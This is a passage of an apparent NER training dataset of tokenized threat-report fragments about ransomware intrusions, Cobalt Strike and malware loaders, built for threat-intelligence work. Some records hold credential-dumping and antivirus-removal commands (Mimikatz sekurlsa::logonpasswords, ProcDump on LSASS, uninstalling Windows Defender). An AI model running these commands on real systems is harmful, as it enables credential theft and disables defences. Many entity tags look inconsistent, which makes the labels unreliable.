] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "cmd.exe", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "invoked", "from", "the", "command", "line" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Another", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "leveraged", "by", "a", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/C" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "using", "the", "command", "line" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "dropped", "several", "batch", "scripts", "on", "the", "server:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "the", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd.exe", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "a", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "installed", "Atera", "and", "Splashtop", "remote", "access", "software" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "They", "then", "repeated", "the", "install", "of", "the", "remote", "access", "software", "package." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "installed", "RSAT", "(Remote", "Server", "Administration", "Tools)", "on", "the", "beachhead", "host" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AnyDesk", "was", "used", "to", "move", "laterally", "between", "a", "workstation", "and", "a", "backup", "server" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "three", "different", "Remote", "Access", "Software", "were", "used", "by", "the", "threat", "actor" ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg" ] }, { "tokens": [ "the", "threat", "actor", "used", "three", "different", "tools", "in", "order", "to", "establish", "an", "interactive", "and", "persistent", "command", "and", "control", "channel." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "installation", "of", "the", "remote", "management", "tools" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "began", "their", "first", "lateral", "movement", "to", "a", "server", "in", "the", "environment", "by", "copying", "their", "Cobalt", "Strike", "DLL", "over", "to", "the", "host", "and", "executing", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "moved", "to", "install", "AnyDesk", "on", "several", "servers", "including", "a", "backup", "management", "host,", "likely", "as", "a", "further", "means", "of", "persistence", "or", "later", "command", "and", "control." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "connected", "to", "a", "domain", "controller", "and", "dropped", "three", "scripts;", "one", "to", "copy", "the", "ransomware", "executable", "to", "all", "hosts,", "one", "to", "reset", "every", "users", "password", "in", "the", "organization,", "and", "a", "final", "one", "to", "execute", "the", "staged", "ransomware", "payload", "using", "PsExec" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "executing", "it", "via", "a", "remote", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "proceeded", "to", "dump", "LSASS", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProcDump", "was", "used", "to", "dump", "LSASS", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "several", "different", "Mimikatz", "implementations", "were", "executed", "on", "the", "domain", "controller,", "including", "a", "Mimikatz", "executable" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "There", "were", "several", "variants", "of", "Mimikatz", "in", "binary", "and", "PowerShell", "form" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "mimikatz.exe", "\"privilege::debug\"", "\"sekurlsa::logonpasswords\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "mimikatz.exe", "privilege::debug", "sekurlsa::logonPasswords", "full", "samdump" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Multiple", "injections", "into", "the", "LSASS", "process", "were", "observed", "on", "multiple", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LSASS", "process", "to", "access", "credentials." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Process", "dump", "of", "the", "LSASS", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "lsass.exe", "beacon" ], "ner_tags": [ "O", "B-SamFile", "O" ] }, { "tokens": [ "c:\\windows\\temp\\procdump64.exe", "-accepteula", "-ma", "lsass.exe" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Several", "more", "beacons", "were", "also", "loaded", "on", "the", "host", "using", "DLLs", "and", "PowerShell." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actor", "moved", "on", "to", "downloading", "a", "variety", "of", "beacon", "executables" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "to", "execute", "various", "dropped", "tools", "or", "beacons", "on", "the", "endpoint," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "files", "that", "where", "downloaded", "from", "those", "sites:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "file", "downloads", "relating", "to", "tooling/scripts." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "downloaded", "the", "lsass.exe", "beacon", "from", "their", "attacker", "hosted", "infrastructure" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lots", "of", "custom", "scripts", "dropped", "by", "threat", "actors" ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Other", "tools", "and", "scripts", "were", "dropped", "onto", "one", "endpoint" ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "often", "opened", "Internet", "Explorer", "to", "download", "their", "beacons" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "The", "threat", "actors", "dropped", "the", "first", "of", "their", "ransomware", "binaries", "on", "the", "fourth", "day", "of", "the", "intrusion" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "had", "the", "clear", "text", "credentials", "for", "one", "of", "the", "domain", "administrator", "accounts", "and", "began", "moving", "lateral", "to", "other", "systems" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "issued", "remote", "commands", "using", "WMIC", "to", "conduct", "discovery,", "as", "well", "as", "distribute", "and", "execute", "Cobalt", "Strike", "beacons." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "additional", "beacons", "executed", "using", "remote", "WMIC", "commands," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "executed", "using", "remote", "WMI", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "use", "of", "WMIC", "was", "leveraged", "by", "a", "batch", "file" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Threat", "actors", "used", "the", "lolbin", "wmic.exe", "in", "order", "to", "execute", "PowerShell", "Cobalt", "Strike", "beacons", "on", "multiple", "workstations", "and", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WmiPrvSe.exe", "(WMI", "Provider", "Host)", "executed", "the", "PowerShell", "Cobalt", "Strike", "beacon", "on", "the", "remote", "computers." ], "ner_tags": [ "B-Way", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "proceeded", "to", "RDP", "to", "the", "domain", "controller." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "starting", "the", "RDP", "session" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "run", "from", "their", "interactive", "RDP", "session" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "used", "to", "proxy", "RDP", "connections", "and", "connect", "to", "another", "computer." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "use", "of", "RDP", "was", "extensively", "used", "throughout", "the", "intrusion,", "using", "a", "variety", "of", "processes" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "establishing", "RDP", "connections" ], "ner_tags": [ "O", "B-Way", "O" ] }, { "tokens": [ "During", "these", "RDP", "sessions," ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "This", "file", "was", "opened", "during", "their", "RDP", "session", "and", "contained", "the", "PowerShell", "commands", "used", "to", "launch", "a", "new", "beacon:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "traffic", "and", "minimize", "external", "RDP", "access" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RDP", "traffic" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "They", "then", "opened", "an", "RDP", "connection", "back", "to", "the", "primary", "domain", "controller" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "executed", "a", "PowerShell", "command", "to", "disable", "Windows", "Defender", "Antivirus", "on", "the", "host" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "Defender", "tampering" ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "B-SecTeam" ] }, { "tokens": [ "powershell.exe", "Uninstall-WindowsFeature", "-Name", "Windows-Defender-GUI" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "reviewed", "Group", "Policy", "Objects", "for", "the", "domain." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "user", "clicked", "on", "the", "ISO", "file,", "which", "created", "a", "new", "virtual", "hard", "drive", "disk" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "when", "the", "victim", "clicked", "on", "the", "LNK", "file,", "it", "triggered", "the", "execution", "of", "the", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Clicking", "on", "the", "LNK", "file", "executes", "the", "batch", "file" ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "hidden", "directory" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "located", "in", "a", "hidden", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "hidden", "view", "attribute", "in", "file", "explorer", "in", "reference", "to", "the", "ProgramData", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "delivered", "a", "hidden", "directory" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "ISO", "file", "was", "delivered", "as", "a", "ZIP", "archive", "via", "a", "malicious", "spam", "mail", "campaign." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-OffAct", "O" ] }, { "tokens": [ "DLL", "was", "executed", "using", "rundll32.exe", ":", "C:\\Windows\\system32\\cmd.exe", "/c", "D:\\max\\eyewear.bat", "➝", "rundll32" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "process", "was", "invoked", "by", "RunDLL32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "malware", "running", "via", "Rundll32" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "file", "was", "executed", "by", "the", "injected", "Rundll32.exe", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "a", "single", "Rundll32.exe", "process" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "rundll32", "locker_32.dll,run" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "loads", "it", "using", "rundll32" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "decoded", "PowerShell", "function" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Decoded", "from", "Base64:" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "A", "scheduled", "task", "was", "then", "created", "using", "this", "same", "DLL." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "scheduled", "task", "was", "created", "at", "that", "time", "to", "maintain", "persistence", "on", "this", "host" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "GetSystem", "creates", "a", "service" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "used", "to", "inject", "a", "new", "beacon", "or", "a", "specific", "program", "to", "another", "process", "on", "the", "victim’s", "computer." ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "injection", "is", "also", "visible", "from", "memory", "dumps" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Several", "hosts", "showed", "rundll32", "processes", "exhibiting", "common", "process", "injection", "behavior" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Code", "injection", "in", "LSASS" ], "ner_tags": [ "I-Way", "I-Way", "O", "O" ] }, { "tokens": [ "an", "injected", "Cobalt", "Strike", "beacon" ], "ner_tags": [ "O", "O", "B-Way", "I-Way", "I-Way" ] }, { "tokens": [ "the", "injected", "Rundll32.exe", "process." ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "common", "processes", "observed", "were", "two", "injected", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "beacon", "injected", "into", "a", "single", "Rundll32.exe", "process" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "to", "discover", "information", "relating", "to", "the", "user" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "host," ], "ner_tags": [ "O" ] }, { "tokens": [ "cmd.exe", "/C", "hostname" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "queried", "a", "number", "of", "target", "hosts", "to", "determine", "the", "host", "disk", "drive", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "can", "be", "useful", "to", "determine", "drives,", "including", "mounted", "network", "shares." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "logicaldisk", "get", "caption,description,drivetype,providername,volumename" ], "ner_tags": [ "B-SamFile", "O", "B-Features" ] }, { "tokens": [ "network", "configuration" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "ipconfig" ], "ner_tags": [ "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C", "dir", "/s", "*file/" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "used", "the", "dir", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/C", "dir" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "was", "double", "base64", "encoded." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "Base64", "encoded", "string:", "The", "-e", "is", "short", "for", "-EncodedCommand." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "The", "base64", "encoding", "starts", "with", "JAB", "that", "is", "a", "common", "pattern", "for", "UTF-16", "starting", "with", "$" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "encoded", "commands:" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "powershell", "-np", "-w", "hidden", "-encodedcommand" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "used", "to", "proxy" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Proxying", "RDP", "traffic", "via", "a", "processes", "such", "as", "a", "Cobalt", "Strike", "beacon", "reduces", "the", "exposure", "of", "the", "threat", "actor’s", "own", "infrastructure,", "and", "blends", "RDP", "activity", "to", "those", "of", "internal", "hosts", "on", "the", "network." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "made", "attempts", "to", "proxy", "RDP", "traffic" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "the", "RDP", "traffic", "was", "being", "proxied", "through" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "attempted", "to", "masquerade", "dropped", "files", "as", "legitimate", "Microsoft", "Windows", "executables" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "file", "was", "unpacked" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "documents", "were", "exfiltrated", "over", "one", "of", "the", "encrypted", "C2", "channels." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "the", "payload", "was", "executed,", "there", "were", "some", "telltale", "registry", "events", "observed" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "files", "were", "then", "deleted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "packed", "versions", "uploaded", "to", "VT" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "pack", "the", "code’s", "dependencies", "into", "the", ".NET", "assembly", "so", "it", "can", "run", "self-contained." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "compression", "using", "QuickLZ" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "with", "names", "invoking", "popular", "videogames", "such", "as", "Fortnite,", "Valorant,", "Roblox", "or", "Warzone2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Idus" ] }, { "tokens": [ "create", "a", "legitimate", "looking", "folder", "to", "drop", "an", "illicit", "version", "of", "the", "System", "Configuration", "Utility", "msconfig.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "creates", "the", "folder", "“C:Windows", "System32”,", "with", "a", "space", "after", "Windows" ], "ner_tags": [ "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "packaged", "into", "an", "obfuscated", "PowerShell", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "heavily", "obfuscated", "batch", "file", "is", "hidden", "and", "automatically", "executed", "when", "launched." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "script", "extracts", "two", "separate", "binaries", "from", "the", "base64", "encoded", "text" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "another", "obfuscated", "binary", "carrying", "an", "embedded", "resource" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "extraction", "of", "the", "resources", "leads", "to", "the", "final", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Option", "to", "embed", "additional", "malware", "to", "be", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "rootkit’s", "DLL", "that", "is", "embedded", "as", "a", "resource" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "fileless", "and", "executed", "only", "in", "memory", "after", "going", "through", "several", "decryptions", "and", "decompression", "routines" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AES", "decrypts,", "and", "GZIP", "decompresses", "it", "to", "produce", "two", "separate", "byte", "arrays" ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "will", "be", "decompressed", "and", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decompress", "and", "decrypt", "the", "final", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hooks", "several", "functions", "from", "ntdll.dll", "to", "hide", "its", "presence." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "leveraging", "Windows", "Management", "Instrumentation", "(WMI)", "to", "identify", "the", "system’s", "manufacturer." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "identify", "the", "system’s", "manufacturer" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "delivered", "to", "the", "victim,", "commonly", "through", "a", "phishing", "mail" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way" ] }, { "tokens": [ "receives", "a", "ZIP", "file", "containing", "a", "benign", "file", "in", "plain", "sight" ], "ner_tags": [ "O", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "automatically", "executed", "when", "launched." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "bat", "file", "format" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "spawned", "with", "PowerShell", "via", "Task", "Scheduler" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "PowerShell." ], "ner_tags": [ "O", "B-Way" ] }, { "tokens": [ "base64", "encoded", "text", "later", "in", "the", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "more", "obfuscation", "and", "encryption", "techniques", "that", "lead", "to", "the", "final", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "as", "obfuscated", "data", "in", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "prefix", "is", "used", "to", "hide", "files,", "directories,", "NamedPipes,", "scheduled", "tasks,", "processes,", "registry", "keys/values,", "and", "services." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O", "B-HackOrg", "B-Way", "I-Features", "O", "B-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "writes", "it", "as", "encrypted", "data." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "it", "as", "soon", "as", "the", "utility", "is", "running" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "as", "obfuscated", "data", "in", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creating", "a", "registry", "key", "to", "store", "the", "malware", "code" ], "ner_tags": [ "B-Way", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "saves", "its", "configuration", "as", "a", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "spawned", "with", "PowerShell", "via", "Task", "Scheduler" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creating", "a", "scheduled", "task", "to", "execute", "the", "malware", "using", "PowerShell." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "injected", "into", "the", "winlogon.exe", "process." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "injected", "into", "other", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "injects", "itself", "and", "additional", "malware(s)", "into", "all", "processes" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "be", "injected", "into", "the", "winlogon.exe", "process" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "carries", "out", "process", "injections" ], "ner_tags": [ "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "loads", "a", "fresh", "copy", "of", "ntdll.dll," ], "ner_tags": [ "O", "O", "O", "O", "O", 